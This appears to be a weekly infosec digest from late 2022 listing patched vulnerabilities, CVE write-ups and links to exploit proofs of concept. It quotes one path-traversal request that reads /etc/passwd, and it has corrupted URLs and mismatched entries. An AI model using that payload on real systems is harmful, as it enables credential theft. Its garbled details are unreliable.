\n\nSecurity Patched within a Week:\n \n > We track the latest Security advisery of top vendors and filter out high and critical vulnerability that has been patched within a week.\n\n \n- *Here’s a look at the Latest Security (Severity : Critical or High) that has been patched from Top vendors in last 2 Week(12th Oct - 18th October 2022) and If you're using any of the old version of mentioned vendors then avoid getting tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit so we will highly recommend **upgrading or updating of vendor products from the origional source.***\n \n - **Apple security advisery** : \n - A vulnerability(CVE-2022-22658) was found in Apple iOS up to 16.0.2 (Smartphone Operating System}. This issue affects some unknown processing of the component Email Handler. The manipulation with an unknown input leads to a denial of service vulnerability.\n \n - **Google security advisery** : \n - This Week google had released the advisety with [pixel](https://source.android.com/docs/security/bulletin/pixel/2022-10-01), [Android Automotive OS Update](https://source.android.com/docs/security/bulletin/aaos/2022-10-01) and Android](https://source.android.com/docs/security/bulletin/2022-10-01). Our advice willl be update these products.\n \n - **Adove security advisery** : \n - Adobe has released security update to address multiple vulnerabilities in Adobe software (Cold Fusion, Acrobat and Reader,Adobe Commerce and Magneto Open Source, Dimension). An attacker can exploit some of these vulnerabilities to take control of an affected system.\n \n - **Github security advisery** : \n - The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to v3.39.4.\n - [aws/amazon-redshift-jdbc-driver](https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86) : A potential remote command execution issue exists within redshift-jdbc42 versions 2.1.0.7 and below. \n \n - Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages. we highly recomend updating & upgrading these Pakages.\n - **Ubuntu 22.04** : thunderbird, kitty, isc-dhcp - DHCP server and client, python-django - High-level Python web development framework, strongswan - IPsec VPN solutio etc.\n \n - **Ubuntu 20.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-ibm - Linux kernel for IBM cloud systems, LibreOffice, kitty, gthumb - image viewer and browser, dotnet6 - dotNET CLI tools and runtime,linux - Linux kernel,linux-aws - Linux kernel for Amazon Web Services (AWS) systems,linux-bluefield - Linux kernel for NVIDIA BlueField platforms,linux-gke - Linux kernel for Google Container Engine (GKE) systems,linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel,linux-ibm - Linux kernel for IBM cloud systems,linux-ibm-5.4 - Linux kernel for IBM cloud systems,linux-kvm - Linux kernel for cloud environments,linux-oracle - Linux kernel for Oracle Cloud systems\n\n - **Ubuntu 18.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-aws-5.4 - Linux kernel for Amazon Web Services (AWS) systems, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-gcp-4.15 - Linux kernel for Google Cloud Platform (GCP) systems, advancecomp - collection of recompression utilities,linux - Linux kernel,linux-aws - Linux kernel for Amazon Web Services (AWS) systems,linux-bluefield - Linux kernel for NVIDIA BlueField platforms,linux-gke - Linux kernel for Google Container Engine (GKE) systems,linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel,linux-ibm - Linux kernel for IBM cloud systems,linux-ibm-5.4 - Linux kernel for IBM cloud systems,linux-kvm - Linux kernel for cloud environments,linux-oracle - Linux kernel for Oracle Cloud systems.\n\n\n - **Microsoft** \n - [Weakness in Microsoft Office 365 Message Encryption could expose email contents](https://www.helpnetsecurity.com/2022/10/14/weakness-office-365-encryption/)\n - Microsoft has released updates to address multiple vulnerabilities in Microsoft software. An attacker can exploit some of these vulnerabilities to take control of an affected system.[Theres has been 55+ security that has been fixed in Microsoft products, pakage & application](https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct) such as Edge (Chromium-based), Microsoft Graphics Component, Microsoft Office : Word, SharePoint, Role: Windows Hyper-V, Visual Studio Code, Microsoft WDAC OLE DB provider for SQL, NuGet Client, Remote Access Service Point-to-Point Tunneling Protocol, Active Directory Domain Services etc\n\n
\n\n
\n\nCVE Analysis, writeups & reports: (6 cve analysis that matter in Last 1 Week)\n \n > Every week, we collect the recetly discovered Writeups & reports for CVE. \n\n \n - [Analysis: CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/)\n - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n - [Nuclei template CVE-2022-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV40684.yaml)\n \n - Vendor : **Fortinet**\n - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n - Patched : Apply updates per vendor instructions.\n - Discription : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS , FortiProxy and FortiSwitchManager allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n \n - [Analysis:CVE-2022-41033](https://www.helpnetsecurity.com/2022/10/11/cve-2022-41033/)\n - Vendor : **Microsoft Products**\n - Affected : All versions of Windows starting with Windows 7 and Windows Server 2008 are vulnerable. \n - Patched : Apply updates per vendor instructions.\n - Discription : Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation.This vulnerability is considered to have a low attack complexity. It has an exploitability score of 1.8 out of four. The potential impact of an exploit of this vulnerability is considered to be very high.\n \n - [Analysis : CVE-2021-45067](https://hacksys.io/blogs/adobe-reader-xfa-ansi-unicode-confusion-information-leak) \n - [PoC : CVE-2022-36067](https://github.com/hacksysteam/CVE-2021-45067)\n \n - Target/Product: **[Acrobat Reader DC](https://get.adobe.com/reader/otherversions/)**\n - Affected Version : 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier)).\n - Discription/Issue/Flaw : Out of Bounds Read caused by treating ANSI string as Unicode in Acrobat Reader DC versions. This vulnerability can be exploited to leak sensitive information from the sandboxed adobe reader process.\n \n - [Analysis : CVE-2022-36067](https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq)\n - Title : [Critical vm2 sandbox escape flaw uncovered, patch ASAP!](https://www.helpnetsecurity.com/2022/10/10/cve-2022-36067/) \n - Target : **vm2 Javascript sandbox library**\n - Affected : version < 3.9.11\n - Discription : Oxeye researchers discovered a severe vm2 vulnerability (CVE-2022-36067) that has received the maximum CVSS score of 10.0. Called SandBreak, this new vulnerability requires R&D leaders, AppSec engineers, and security professionals to ensure they immediately patch the vm2 sandbox if they use it in their applications. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. \n \n \n - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB) \n \n - Target/Product: **Apache Common Text** is a software component used to manipulate character strings, published by the Apache Foundation .\n - Discription/Issue/Flaw : \nCVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list . This vulnerability closely resembles the Log4Shell CVE series , and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another , or to construct messages from a preconfigured format.\n \n \n - [Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF)\n \n - Summary :-> [Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://www.cisa.gov/uscert/ncas/alerts/aa22-279a)\n - Affected Vendors : \n \n \n - Discription: US authorities (NSA, FBI, CISA) expose the TOP 20 vulnerabilities actively exploited by Chinese state-sponsored attackers and NSA, CISA, and FBI urge organizations to apply the recommendations below\n \n - Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.\n - Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n - Block obsolete or unused protocols at the network edge. \n - Upgrade or replace end-of-life devices.\n - Move toward the Zero Trust security model. \n - Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.\n \n
\n\n
\n PoC for CVE & Exploit (Total : 5+ new 0-day matter in this week and 4 imoprtant from CVE last week) :\n \n > Every week we're tracking the recetly discovered Exploit and PoC for CVE. \n\n \n - [Poc CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n \n - Target/Product: **Google Chrome**\n - Affected Version: Poc maker calims \"All\" but CVE says version < 80.0.3987.149\n - Solution : google-chrome-upgrade-latest \n - Discription : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n \n - [PoC CVE-2022-41852(unoffical)](https://github.com/Warxim/CVE-2022-41852)\n \n - Target/Product: **Apache**\n - Discription : Remote Code Execution in JXPath Library. (For example, methods JXPathContext.getValue(path) and JXPathContext.iterate(path) are dangerous if you let user send input into the path parameter.) where CVE-2022-41852 allows attackers to execute code on the application server. You can read more about this [vulnerability here:](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)\n\n \n - Important **Poc from Last Week** :\n \n - [CVE-2022-41208-PoC](https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse)\n \n - Target/Product: **Microsoft Exchage Server**\n - Affected Version: <8.3.1 \n - Discription : ProxyNotShell – CVE-2022-40140 & CVE-2022-41082. Metasploit Framework implementation of zer?-day bug in Microsoft Exchage Server which leads to RCE.\n \n - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC) \n - Target/Product: **Microsoft Exchage Server**\n - Discription : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server. \n - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker) \n \n - [PS5-4.03-Kernel-Exploit](https://github.com/Cryptogenic/PS5-4.03-Kernel-Exploit)\n - Target/Product: **PS5**\n - Exploit support firmwares : 4.03, 4.50, 4.51\n - Discription/Issue/Flaw : ??PS5 kernel exploit based on TheFlow's IPV6 Use-After-Free (UAF), which was reported on HackerOne. The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC with some changes to accommodate the annoying PS5 memory layout (for more see Research Notes section). It establishes an arbitrary read / (semi-arbitrary) write primitive. This exploit and its capabilities have a lot of limitations, and as such, it's mostly intended for developers to play with to reverse engineer some parts of the system.\n \n \n - [DropBox-XPC-Exploit](https://github.com/Pwnrin/DropBox-XPC-Exploit)\n - Target/Product: **Dropbox**\n - Discription/Issue/Flaw : ??DropBox-XPC-Exploit (https://github.com/Pwnrin/DropBox-XPC-Exploit) is a exploit for PID Reuse and Logical Error in DropBox's XPC service.\n \n
\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 27th Sept-11th October 2022\n\n\n\n \n Security Patched within a Week: # Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022). \n featuring releases from Microsoft, Adove, Github, Cisco, Linux(Ubuntu, kali etc), Firefox etc.\n\n CVE:ANALYSIS & POC: Cve-2022-34960, cve-2022-41218, HackerOne report #1672388- Gitlab, cve-2022–33987, \n Cve-2022–36635 and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020 \n\n \n CVE POC (0-Day): Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit, \n Cve Collection of jQuery UI XSS Payloads, nuclei-templete for cve-2022–35405, An updated list of PoC's cve's, \n \n PS5-4.03-Kernel-Exploit, cve-2022-41040, cve-2022-26726, cve-2022-30600, cve-2022-39197, cve-2021-29156 Exploit, \n Cve-2022-30206, cve-2022-2992, cve-2022-41208, cve-2022-2274 and cve-2022-36804\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 21th Sept-27th Sept 2022\n\n \n Security Patched within a Week: Latest vulnerability that has been patched within a week(21th Sep-27th Sep 2022). \n featuring releases from Apple, Google, Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc.\n \n CVE:ANALYSIS & POC: CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, cve-2021-41653, CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.\n \n CVE POC (0-Day): CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos poc, \n CVE-2022-23743, Webshell - Open source project, Windows10 - Custom Kernel Signers.\n \t\n
\n\nSecurity Patched within a Week: \n\n- Here’s a look at the Latest Security (Severity : Critical or High) that has been patched in a Week(21th Sep-27th Sep 2022) and We highly recommend upgrading or updating from the origional source. \n \n- **WhatsApp** Security Advisories September Update : CVE-2022-36934(prior to v2.22.16.12) and CVE-2022-27492(prior to v2.22.16.2).\n- **Node.js** Update Fixes High Severity Flaws : CVE-2022-32212, CVE-2022-32215 & CVE-2022-35256. (Affected v18.x, v16.x, and v14.x )\n- Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages.\n - **Ubuntu 22.04** : bind9, mako, tiff, linux-gkeop, python-oauthlib, linux-oem-5.17, linux-gcp, linux-gke, linux-raspi - Li, etc.\n - **Ubuntu 20.04 LTS** & Ubuntu 18.04 LTS*: bind9, mako, tiff, libjpeg-turbo, vim, xen, etcd, linux-hwe-5.15/5.4, linux-lowlatency-hwe-5.15/5.4, linux, linux-aws, linux-aws-5.15/5.4 , linux-azure, linux-azure-5.15/5.4 , linux-kvm, linux-bluefield, linux-gkeop, linux-ibm, linux-ibm-5.4, linux-oracle, linux-oracle-5.4.\n\n - **Microsoft** [Endpoint Configuration Manager Spoofing Vulnerability](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972)\n- **Cisco** [NX-OS Software Border Gateway Protocol Denial of Service Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nxosbgp?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20NX-OS%20Software%20Border%20Gateway%20Protocol%20Denial%20of%20Service%20Vulnerability&vs_k=1)\n- **Mozilla** Releases Security Updates for [Firefox 105](https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/), [Firefox ESR 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-41/), [Thunderbird 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-42/) & [Thunderbird 91.13.1](https://www.mozilla.org/en-US/security/advisories/mfsa2022-39/).\n- **Jenkins** [Security Advisory 2022-09-21](https://www.jenkins.io/security/advisory/2022-09-21/).\n- **Zoho** [ManageEngine Multiple Products Remote Code Execution Vulnerability CVE-2022-35405(CVSS score 9.8)](https://socprime.com/blog/cve-2022-35405-detection-cisa-warns-of-adversaries-leveraging-manageengine-rce-flaw/)\n- **Sophos** [Firewall Code Injection Vulnerability CVE-2022-3236](https://www.helpnetsecurity.com/2022/09/26/cve-2022-3236/)\n- **IBM** [Maximo Asset Management 7.6.1.1, 7.6.1.2, and 7.6.1.3 (CVE-2022-40616)](https://nvd.nist.gov/vuln/detail/CVE-2022-40616) \n- **Adobe** [Bridge version 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability](https://helpx.adobe.com/security/products/bridge/apsb22-49.html)\n\n
\n\n
\n\nCVE Analysis & PoC(9):\n\n\n - [Analysis: CVE-2022-39197](https://securityonline.info/cve-2022-39197-critical-cobalt-strike-bug-could-lead-to-rce-attacks/)\n \n - Title -> Critical Cobalt Strike bug could lead to RCE attacks.\n - [PoC CVE-2022-39197](https://github.com/burpheart/cve-2022-39197)\n - Affected Version : prior to 4.7.1.\n - Discription/Issue/Flaw : The CVE-2022-39197 vulnerability exists in Cobalt Strike’s Beacon payload, which may allow an attacker to trigger XSS by setting a fake username in the Beacon configuration, thereby causing remote code execution on the CS Server.\n \n - [Analysis: CVE-2022-36934 and CVE-2022-27492](https://nakedsecurity.sophos.com/2022/09/27/whatsapp-zero-day-exploit-news-scare-what-you-need-to-know/)\n - Title -> WhatsApp “zero-day exploit” news scare – what you need to know\n - Affected Version : Android prior to v2.22.16.12, Business for Android < v2.22.16.12, iOS < v2.22.16.12, Business for iOS < v2.22.16.12\n - Discription/Issue/Flaw : CVE-2022-36934 (An integer overflow in version v2.22.16.12 could result in remote code execution in an established video call.) & CVE-2022-27492 (An integer underflow in v2.22.16.2 could have caused remote code execution when receiving a crafted video file.) \n \n - [Analysis: CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208](https://blog.sonarsource.com/onedev-remote-code-execution/)\n - Title -> Securing Developer Tools: **OneDev** Remote Code Execution.\n - Affected Version : 7.2.9.\n - Discription/Issue/Flaw : OneDev tool has various features such as code search, CI/CD and static code analysis and it is an alternative to GitHub, GitLab and Bitbucket and it is open text. In this article paul gerste discussed mentioned CVE ID.\n \n - [Analysis: CVE-2022-40286](https://www.x86matthew.com/view_post?id=windows_seagate_lpe)\n - Title -> Exploiting a Seagate service to create a SYSTEM shell.\n - Target & Affected Version : Seagate Media Sync.\n - Discription/Issue/Flaw : OneDev tool has various features such as code search, CI/CD and static code analysis and it is an alternative to GitHub, GitLab and Bitbucket and it is open text. In this article paul gerste discussed mentioned CVE ID.\n \n - [Analysis : cve-2021-41653](https://k4m1ll0.com/cve-2021-41653.html)\n - [cve-2021-41653 video Poc](https://www.youtube.com/watch?v=GBuuGdeTKgw&feature=youtu.be)\n - Target/Product: **TP-Link**\n - Title: : TP-Link TL-WR840N EU v5 Remote Code Execution.\n - Discription/Issue : The goal was to achieve remote code execution on a TP-LINK TL-WR840N EU (V5) router. According to its papers, this version came out in 2017 and in case you're still susing the old version then we highly recommend upgrading the firmware to the latest version \"TL-WR840N(EU)_V5_211109\". It can be downloaded from the vendor homepage. \n\n
\n\n
\n CVE PoC, shell & Exploit (9) :\n\n \n \n - [CVE-2022-39197 Poc](https://github.com/Wh04m1001/ZoneAlarmEoP)\n - Target/Product: **Cobalt Strike**\n - Discription/Issue/Flaw : CVE-2022-39197 Cobalt Strike XSS vulnerability patch. Disable html support for swing by hooking the isHTMLString method of javax.swing.plaf.basic.\n \n - [CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC) \n - Target/Product: **Atlassian Bitbucket **\n - Affected Version: <8.3.1 \n - Discription : The script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances. The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.\n \n -[CVE-2022-30206](https://github.com/Pwnrin/CVE-2022-30206) \n - Target/Product: **Microsoft**\n - Discription : PoC for Microsoft CVE-2022-30206: Windows Print Spooler Elevation of Privilege Vulnerability.\n \n - [CVE-2022-28282](https://github.com/Pwnrin/CVE-2022-28282)\n - Target/Product: **Firefox**\n - Discription/Issue/Flaw : PoC for CVE-2022-28282 Firefox: heap-use-after-free in DocumentL10n::TranslateDocument.\n \n - [CVE-2022-34729](https://github.com/Pwnrin/CVE-2022-34729)\n - Target/Product: **NorthSea**\n - Discription/Issue/Flaw : NorthSea decided to delay the disclosure of this POC for some reason.\n\n - [Cronos poc](https://github.com/Idov31/Cronos)\n - Discription : PoC for a new sleep obfuscation technique (based on [Ekko](https://github.com/Cracked5pider/Ekko)) leveraging waitable timers to RC4 encrypt the current process and change the permissions from RW to RX to evade memory scanners.\n \n \n - [CVE-2022-23743 Poc](https://github.com/Wh04m1001/ZoneAlarmEoP)\n - Target/Product: **Check Point's ZoneAlarm antivirus**\n - Affected Version: < 15.8.211.19229\n - Discription/Issue/Flaw : Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV.\n \n \n - [Webshell - Open source project](https://github.com/tennc/webshell) \n - Discription : Scripts that enable threat actors to compromise web servers and launch additional attacks. This project covers a variety of commonly used scriptsSuch as: asp, aspx, php, jsp, pl, py. NOTE : This project is only for testing, and all the consequences have nothing to do with authors.\n \n - [Windows10 - Custom Kernel Signers](https://github.com/HyperSine/Windows10-CustomKernelSigners ) \n - Discription : Load self-signed drivers without TestSigning or disable DSE. \n \n
\n---\n\n## CVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 14th September - 20th September 2022\n\n \n Security Patched : Latest IT security vulnerability patched within this week on selected company such as Whatsapp, Apple, Google, \n Google, Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc. \n \n CVE:ANALYSIS & POC: CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps. \n \n \n CVE POC : CVE-2022-32548 RCE, CVE-2022-2588, CVE-2022-34721, CVE-2022-36804, CVE-2022-34709, \n CVE-2022-33980, CVE-2019-2215 & GwisinMsi poc based on Recreating an MSI Payload for Fun and no profit blog. \n\n
\n\n#### Security patched within a Week.(Trail)\n \n - Apple iOS, iPadOS, and macOS Remote Code Execution Vulnerability CVE-2022-32917\n - Code Aurora ACDB Audio Driver Stack-based Buffer Overflow Vulnerability CVE-2013-2597\n - Linux Kernel \n - Improper Input Validation Vulnerability CVE-2013-6282\n - Integer Overflow Vulnerability CVE-2013-2596\n - Privilege Escalation Vulnerability CVE-2013-2094\n - Github packages :\n - Multiple *Tensorflow(< 2.10.0)Packages*(tensorflow, tensorflow-cpu, tensorflow-gpu) are vulnerable to \n CHECK fail & segfault that can be used to trigger a denial of service attack.\n - oauthlib/oauthlib package (>=3.1.1) vulnerable to DoS when attacker provide malicious IPV6 URI.\n - In reactphp/http package (>= 0.7.0, < 1.7.0), when ReactPHP is processing incoming HTTP cookie values, the cookie names are url-decoded. This may lead to cookies with prefixes like __Host- and __Secure- confused with cookies that decode to such prefix, thus leading to an attacker being able to forge cookie which is supposed to be secure. and It has been Fixed in reactphp/http v1.7.0.\n \n - Microsoft Windows Common Log File System (CLFS) Driver Privilege Escalation Vulnerability CVE-2022-37969\n - Microsoft Windows Remote Code Execution Vulnerability CVE-2010-2568\n - Trend Micro Apex One and Apex One as a Service Improper Validation Vulnerability CVE-2022-40139\n \n #### CVE Analysis & poc\n \n - [CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps](https://breakpoint.sh/posts/turning-your-computer-into-a-gps-tracker-with-apple-maps)\n - [CVE-2022-32883 Poc](https://github.com/breakpointHQ/CVE-2022-32883)\n - Target/Product: **Apple Maps**\n - Patched : Update your devices running iOS and iPadOS to iOS 15.7/16 and iPadOS 15.7 and macOS Monterey to 12.6.\n - Discription/Issue : Ron Masses found and disclosed 2 vulnerabilities in Apple Maps that allowed him to extract the accurate location of the user without authorization.\n \n - [GwisinMsi poc](https://github.com/ChoiSG/GwisinMsi)\n - Title: PoC MSI payload based on ASEC/AhnLab's blog - [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n - Target/Product: **MSI**\n - Discription/Issue : The payload is based on the [Gwisin ransomware's MSI payload analysis of the AhnLab ASEC team's blog post](https://asec.ahnlab.com/en/37483/).\n \n - [CVE-2022-2588 Poc](https://github.com/sang-chu/CVE-2022-2588)\n - Target/Product: **Linux kernel**\n - Discription/Issue: Linux kernel cls_route UAF\n \n \n - [CVE-2022-34721 poc](https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721)\n - Title: Windows Internet Key Exchange (IKE) Protocol Extension Remote Code Execution.\n - Target/Product: **Windows Internet Key Exchange (IKE)**\n - Discription/Issue: The 3 vulnerabilities related to IKE Extension was patched on Patch Tuesday in September 2022. One of the vulnerabilities was found during IKE related research, which was patched by Yuki Chen.\n \n - [CVE-2022-36804 PoC](https://github.com/CEOrbey/CVE-2022-36804-MASS-RCE)\n - Target/Product: **Atlassian Bitbucket Server and Data Center**\n - Affected Version: All versions of Bitbucket Server and Data Center released before versions 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.2, 8.2.2, and 8.3.1 are vulnerable.\n - Discription/Issue : A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances.\n \n \n - [CVE-2022-34709 poc](https://bugs.chromium.org/p/project-zero/issues/detail?id=2301)\n - Title: **Windows: Credential Guard ASN1 Decoder Type Confusion EoP**\n - Discription/Issue : A number of Kerberos CG APIs do not verify the ASN1 PDU type when decoding and encoding Kerberos ASN1 structures leading to type confusion and elevation of privilege. and window patched this CVE-2022-34709 - [Windows Defender Credential Guard Security Feature Bypass Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34709) with new version.\n\n \n - [CVE-2022-33980 poc](https://github.com/HKirito/CVE-2022-33980) \n - Target/Product: **Apache**\n - Affected Version: 2.4 through 2.7\n - Discription/Issue: Apache Commons RCE can use url,dns,script key-words to connect any server\n \n - [CVE-2019-2215 poc](https://github.com/ameetsaahu/Kernel-exploitation/tree/main/CVE-2019-2215)\n - Target/Product: **Linux kernel**\n - Affected Version: >= 4.14\n - Discription/Issue: Exploit for bad binder CVE-2019-2215 on x86_64 Android.\n \n
\n \n---\n
\n \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 07th Sept - 13th Sept 2022\n\n CVE POC : CVE02022-22629 MacOS, CVE-2022-37706, CVE-2022-40297, CVE-2022-34169, CVE-2022-20128, CVE-2022-20360, CVE-2022-27925, \n CVE-2022-37299,CVE-2022-25260, Chaining CVE-2021-42278 and CVE-2021-42287. \n \n CVE Analysis : Latest IT security vulnerability patched on selected company such as Apple, Google, Microsoft, Github, \n Linux(Ubuntu, kali etc) & D-Link & CVE-2022-34169, CVE-2022-31474 Wordpress, \n \n Exploit : Mobile Mouse 3.6.0.4 Remote Code Execution, \n\n \n \n### CVE PoC :\n - [CVE-2022-22629 MacOS PoC](https://github.com/parsdefense/CVE-2022-22629)\n \n - Target & Affected Version: **MacOS - Safari <15.4**\n - Discription/Issue : This poc for the WebGL( A javascript API that is used in browsers to render 2D and 3D graphics.) bug that was patched in Safari 15.4 security updates.\n \n - [CVE-2022-37706 PoC](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)\n \n - Target & Affected Version: **Ubuntu 22.04 & Distro**\n - Discription/Issue : A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04) \n \n - [CVE-2022-40297 PoC](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc)\n \n - Target & Version : **Ubuntu Touch 16.04**\n - Title : Privilage escalation in Ubuntu Touch 16.04 - by PIN Bruteforce\n - Description : Ubuntu Touch allows you to \"protect\" devices with a 4-digit passcode. Such a code was set in a demonstration device. The problem is that the same 4-digit passcode then becomes a password that we can use with the sudo command and gain root privileges. This means that a malicious application can do us double harm:\n 1. Easily escalate privileges and take control of the device.\n 2. It can pass the screen unlock passcode to a third party.\n\n - [CVE-2022-20128 PoC](https://github.com/irsl/CVE-2022-20128)\n \n - Target : **Android Debug Bridge (adb) - directory traversal**\n - Description : Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue/compromised adb daemons during an adb pull operation.\n\n - [CVE-2022-20360 Poc](https://github.com/nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360)\n - Target : **Android setChecked LPE**\n\n - [CVE-2022-27925 Poc](https://github.com/mohamedbenchikh/CVE-2022-27925)\n \n - Target & Patched Version : **Zimbra released a patched on 8.8.15P31 and 9.0.0P24.**\n - Title : Zimbra Unauthenticated Remote Code Execution Exploit.\n - Description : CVE-2022-27925 was originally listed as an RCE exploit requiring authentication. When combined with a separate bug, however, it became an unauthenticated RCE exploit that made remote exploitation trivial.\n \n - [CVE-2022-37299 Poc](https://vulners.com/cve/CVE-2022-37299)\n \n - Target & Version: **Shirne CMS 1.2.0. Path Traversal**\n - PoC: GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test:\n GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test\n \n - [Chainning CVE-2021-42278 and CVE-2021-42287 PoC](https://github.com/Ridter/noPac)\n - Discription/Issue : Exploiting [CVE-2021-42278 and CVE-2021-42287](https://4sysops.com/archives/exploiting-the-cve-2021-42278-samaccountname-spoofing-and-cve-2021-42287-deceiving-the-kdc-active-directory-vulnerabilities/) to impersonate DA from standard domain user. \n\n - [CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260)\n \n - Target & Patched Version : **JetBrains Hub <2021.1.14276**\n - Title : JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF).\n \n - Description : JetBrains Hub before 2021.1.14276 was vulneable to improper access control (CVE-2022-34894), which allows an attacker create untrusted services without authentication even if guest user is disabled. This makes it possible to exploit the vulnerablity 